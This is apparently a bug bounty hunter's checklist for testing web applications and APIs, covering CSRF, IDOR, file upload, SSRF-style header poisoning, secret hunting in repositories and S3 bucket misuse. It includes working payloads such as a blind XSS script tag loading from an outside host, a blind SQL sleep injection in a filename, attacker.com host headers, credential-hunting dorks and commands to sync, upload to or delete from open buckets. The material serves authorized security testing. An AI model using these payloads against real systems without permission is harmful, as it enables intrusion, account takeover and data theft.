Web / APIs

This checklist is designed as a practical cheatsheet for bug bounty hunters.
It provides a structured way to critically review common attack surfaces, identify weak points,
and validate security controls in web applications.
The goal is efficiency: focus on what matters, minimize noise, and cover the techniques that consistently reveal real issues.

  • Analyse the app putting XSS payloads
  • ATO via CSRF attack (changing email)
  • ATO oauth third party apps
  • CSRF in sensitive functions
  • Critical IDORs
  • Upload features for malicious files
  • Horizontal privilege escalation in company settings
  • Vertical privilege escalation in company settings
  • Account deletion endpoints
  • 2FA bypass (direct, rate limit, response manipulation, etc)
  • No rate limiting in authentication/sensitive endpoints
  • Rate limiting bypasses (after getting 429 response)
  • Check origin IP address (DNS history records)
  • Race condition in functions that allow limited use only
  • Account data deletion
  • HTML injection in custom email functions
  • Dangerous HTTP methods enabled X-HTTP-Method-Override: PUT
  • Signup feature
  • Burp plugin “ParamMiner” to guess parameters/headers
  • Check JWT tokens authentication/authorization
  • Check account creation steps
  • Test weak password policy (low issue + bruteforce = takeover)
  • CAPTCHAs bypass
  • Subdomain takeover with impact
  • S3 bucket takeovers
  • Blind XSS in: contact us, ticket support, feedback, chat app
  • “Ticket Trick” vulnerability
  • Fuzzing for misconfiguration and sensitive files
  • CORS in sensitive endpoints
  • Test XXE if the server accepts SVG files
  • Use WaybackUrls for URLs

Host Header Poisoning:

X-Host: attacker.com
X-Server: attacker.com
X-Forwarded-For: attacker.com
X-Forwarded-Host: attacker.com
  • Parameter Pollution — /email=danielv@gmail.com&email=attacker@gmail.com
  • Test “remember-me” function
  • Session fixation
  • Cookie bomb (e.g., endpoint/?dummy_cookie=reflect_this)
  • Password-reset token not expiring
  • Long Password/Email DoS attack

  • Remove CSRF token from request
  • Remove CSRF token parameter value
  • Change POST to GET and remove token:
    endpoint/?csrftoken=&dummy=danielvcookies
  • Use CSRF from another account

Change Content-Type: application/json to
Content-Type: text/plain or
Content-Type: application/x-www-form-urlencoded.

  • Upload unexpected file formats to achieve RCE (swf, html, php, php3, aspx)
  • Use Burp Suite “Upload Scanner” for varied file-upload checks
  • Blind SQL in filename:
    pocfilename’+(select*from(select(sleep(20)))a)+’.jpeg
  • Upload filename.jpg — if the name reflects, try XSS
  • Always try XXE in .docx, .pdf and .xml uploads

Always check responses for these extensions:

  • .svg
  • .html
  • .swf
  • .xml

PHP extensions:

.php
.php3
.php4
.php5
.php7
.pht
.phar
.phpt
.pgif
.phtml
.phtm

Double extensions:

.jpeg.php
.jpg.php
.png.php

Common injection points:

  • SQL in User-Agent header
  • Parameter id
  • Currency values
  • Item number values
  • Sorting parameters (asc, desc)
  • Cookie values
  • Custom headers (possible WAF/CDN integrations)

"><script src=https://blinddanielv.xss.ht></script>

  • User-Agent
  • Place payload in order form (address line)
  • Contact us page
  • Feedback page
  • Chat app
  • Requests (delete account, unlock beta feature)
  • Signup page (free trial)

Common places:

  • Signup / Sign in / Login
  • Password-reset forms
  • Manual test:
    https://host.com/login?redirect=https://attacker.com

Open redir + XSS:
redirectUrl=https://www.google.com/";alert(0);//

Common functions:

  • Non-public images
  • Receipts
  • Private files (PDF, etc.)
  • Shipping info & purchase orders
  • Messaging (send/delete)

Common params:

id=
user=
account=
number=
order=
no=
doc=
key=
email=
group=
profile=
edit=

Tip: check SQL injection in IDORs.

Clone all the COMPANY or USER repositories:

curl -s "https://api.github.com/users/COMPANYorUSER/repos?per_page=100" \
| jq -r ".[].git_url" | xargs -L1 git clone

Then use GitLeaks:

gitleaks -p all-company-and-user-gits\ -o gitleak-results -v

Some useful dorks:

"target" password
"target" access_token
"target" client_secret
"target" account_sid
"target" private_token
"target" secret
"target" credentials
"target" token
"target" config
"target" key
"target" pass
"target" login
"target" ftp
"target" pwd
“company.com” “dev”
“company.com” API_key
“company.com” password
"target" db_host
"target" db_name
"target" db_user
"target" db_password

List open buckets:

aws s3 ls s3://bucket.name

Download entire bucket:

aws s3 sync s3://bucket-name .

Upload file:

aws s3 cp malicious.txt s3://bucket-name/malicious.txt

Remove file:

aws s3 rm s3://bucket-name/malicious.txt


Daniel_v
Ethical Hacker at
Bugcrowd | Hackerone | YWH HackenProof
Penetration Tester

Awards

Bugcrowd MVP Q4-2022
On Patrol award for #HackUS government campaign at H1
Bugcrowd MVP Q2-2019
Bugcrowd Bounty Slayer Q3-19
Bugcrowd MVP Q3-2019
Bugcrowd MVP Q4-2019
Bugcrowd MVP Q2-2020

View more

Statistics

Top 110 hacker on Bugcrowd
~650 validated reports
~195 companies in Hall of Fame

View more